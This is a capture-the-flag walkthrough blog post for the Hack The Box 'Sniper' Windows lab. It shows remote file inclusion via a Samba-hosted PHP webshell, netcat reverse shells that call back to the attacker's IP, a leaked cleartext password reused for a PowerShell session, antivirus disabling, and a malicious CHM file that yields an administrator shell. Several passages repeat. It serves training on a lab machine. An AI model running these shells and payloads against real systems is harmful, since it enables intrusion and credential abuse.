Hack The Box - Sniper Server
Sniper is retired (28.3.2020) Microsoft Windows server on the HackTheBox penetration testing lab. It was marked with Medium difficulty and can be cracked by using a vulnerability in Windows help files... As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.
We will use/learn: nmap, burpsuite, samba, enum4linux, reverse shell, netcat, powershell & credentials creation from cleartext in PS, Windows Help files (*.chm) etc.
Getting User:
I am going to add the server's IP (10.10.10.151) to /etc/hosts file, so I can keep using the hostname (sniper.htb) instead of the IP address.
Let's start with a basic enumeration of the ports & services running on the server with nmap (Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. Source.
Let's start with a basic enumeration of the ports & services running on the server with nmap (Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. Source.
For those not familiar with the command I suggest checking this cheat-sheet first: CheatSheet.
command: nmap -sC -sV -A -p- sniper.htb
Checking SMB ports (139/445) showed us nothing important, neither did enum4linux script (enum4Linux is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts, can be downloaded here: Download), let's check the HTTP port 80. The "landing" page does not really show us much, however, when we navigate to blog and try to select a different language, it looks like the page is injectable with Local File Inclusion / Remote File Inclusion (More information about LFI / RFI in Wikipedia):
Let's capture the traffic in BurpSuite and analyze it (Burp Suite is an integrated platform for performing security testing of web applications and is pre-installed in Kali Linux). So let's intercept the traffic coming to and from the site, send it to "Repeater" in Burp Suite and try to access a file that we 100% know is present on the server (e.g. \WINDOWS\System32\drivers\etc\hosts).
And we can see in the right window, that we see an output of the hosts file. Which means, we should be able to access a samba share as well. Let's setup samba on the Kali Linux first. I tried to user smbshare.py script, but it did not work, so we have to use the classic samba share. Setup Samba as follows:
command: vi /etc/samba/smb.conf
And create your share:
Now create the Samba directory which we are going to use for the attack:
Command: mkdir /root/Downloads/HTB/sniper.htb/PK
And restart samba. Command: service smbd restart
Now we should be able to get a reverse shell. I tested multiple PHP reverse shells, but could not get any of them working. Someone on the HTB forum advised me to get White Winter Wolf shell - an interactive PHP shell. Let's download it:
command: git clone https://github.com/WhiteWinterWolf/wwwolf-php-webshell.git
and copy the shell to the samba directory:
command: cp webshell.php /root/Downloads/HTB/sniper.htb/PK
Now we can check in BurpSuite, that Samba is working and that we can see the file in the PK directory:
And it works! So now we can browse the server (the URL is sniper.htb/blog/?lang=\\<Your HTB VPN IP address>\PK\webshell.php).
When we navigate to the C:\Users directory, we can see there is user Chris created on the server. We will need to find his credentials. But first, we should be getting a proper reverse shell. Let's try to download netcat for windows:
On the server create a new directory under c:\ (command: mkdir PK)
Download netcat from here : Download (note that this is 5.th version of netcat I tried - there seems to be an antivirus active on the server, preventing certain files to be copied over). Also make sure you download the version 1.12.
Once you have the directory created, upload the nc.exe in it (via upload button). You should get a success message "Uploaded file c:\PK\nc.exe successfully":
Now we will be able to get our reverse shell by using the nc.exe file we copied over:
On Kali Linux run command: nc -lnvp 5678
On the Windows server run command : nc.exe -e PowerShell <Your IP Address> 5678 and you will get the reverse shell:
Now we can start the enumeration. In C:\inetpub\wwwroot\user directory there is file called db.php. And in it there are MySQL connection details, including username and password:
I tried to login via evil-winrm tool, but I was not able to log in with the credentials found, possibly because of the SeImpersonatePrivilege privilege (When you assign the "Impersonate a client after authentication" user right to a user, you permit programs that run on behalf of that user to impersonate a client. This security setting helps to prevent unauthorized servers from impersonating clients that connect to it through methods such as remote procedure calls (RPC) or named pipes - Source)
No local privileges to exploit, so need to figure out another way in. But we create a PowerShell credential from the clear text password. Based on this article we are able to create a new PowerShell session by using the method above and a PS command mentioned in this Microsoft Technical note. Instead of one long line, I prefer to store the values in variables like this:
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$session = New-PSSession -ComputerName sniper -Credential $credential
Then open another netcat session on our Kali Linux (command: nc -lnvp 6789) and then run the command on Sniper server:
Invoke-Command -Session $session -ScriptBlock { C:\pk\nc.exe -e powershell 10.10.14.6 6789}
Now we have a reverse shell as user Chris and we can get the user's flag in C:\Users\Chris\Desktop\user.txt
Getting Root:
Quick enumeration of all "uncommon" directories on the server revealed a note in C:\Docs directory, left by the CEO of the company:
So it looks like the web is somehow vulnerable. Let's continue to search the server. In Users\chris\Downloads we can see instructions.chm file:
What does google say about the chm files:
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. It may contain many compressed HTML documents and the images and JavaScript they link to. CHM features include a table of contents, index, and full-text searching.
After a bit of googling various exploits of CHM files, I came up to this PowerShell script Link, which creates a malicious payload.
I tried to upload it to the Windows server and create a payload with another reverse shell, but Antivirus is blocking the file upload via the PHP window shell we used earlier. So let’s try to upload it via simpleHTTPserver.py script (can be downloaded here):
In your Kali Linux run:
root@kali:~/Downloads/scripts/Out-CHM# python ../SimpleHTTPServer/SimpleHTTPServer.py 80
root@kali:~/Downloads/scripts/Out-CHM# python ../SimpleHTTPServer/SimpleHTTPServer.py 80
Serving HTTP on 0.0.0.0 port 80 ...
and then on the Windows server run:
PS C:\PK> wget http://10.10.14.6:80/out-CHM.ps1 -OutFile out-chm.ps1
it will create a new file called doc.chm
Unfortunately, the antivirus on the server keeps deleting the file, so we need to create the payload on another MS Windows machine with Windows Defender switched off!
Run the following commands:
On our personal Windows personal computer, disable the antivirus:
Before you are able to create the payload, you will have to download and install HTML Help from here: Link. As described in the Out-Chm documentation, it is a pre-requisite to have HTML Help installed: The script generates a CHM file which needs to be sent to a target. You must have hhc.exe (HTML Help Workshop) on your machine to use this script. Source
Once the Antivirus is disabled and HTML help is installed, download the Powershell script again:
Before you are able to create the payload, you will have to download and install HTML Help from here: Link. As described in the Out-Chm documentation, it is a pre-requisite to have HTML Help installed: The script generates a CHM file which needs to be sent to a target. You must have hhc.exe (HTML Help Workshop) on your machine to use this script. Source
Once the Antivirus is disabled and HTML help is installed, download the Powershell script again:
Import it via this command: Import-module Out-Chm.ps1 and then you can create the malicious payload with reverse shell:
And copy it back to your Kali Linux. Then start netcat listener command: nc -lvnp 9988
Upload our doc.chm file to the Sniper Windows server, into c:\Docs directory, as instructed by "the CEO":
Wait a minute (the file will be picked up) and you will get a reverse shell as administrator.
Wait a minute (the file will be picked up) and you will get a reverse shell as administrator.
Comments
Post a Comment